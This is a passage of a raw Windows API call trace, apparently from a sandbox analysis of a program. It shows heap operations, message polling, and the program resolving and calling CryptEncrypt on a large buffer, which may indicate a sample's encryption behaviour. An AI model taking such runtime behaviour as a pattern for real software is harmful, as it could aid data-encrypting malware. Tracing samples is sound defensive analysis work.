hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0207.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.389] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.390] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0207.390] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0207.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d02f0 | out: hHeap=0x25c0000) returned 1 [0207.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0207.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.393] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0207.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0207.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0207.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0207.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0207.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.395] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0207.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0207.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0207.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0207.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0207.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0207.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0207.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0207.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0207.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0207.396] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xf044, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xf048) returned 1 [0207.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0207.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0207.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0207.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0207.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0207.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0207.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0207.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0207.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0207.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0207.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0207.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0207.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0207.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0207.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0207.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0207.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0207.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0207.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0207.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0207.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0207.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0207.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0207.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0207.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0207.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0207.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0207.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0207.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.400] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.401] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.401] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.401] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0207.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.402] CharLowerBuffW 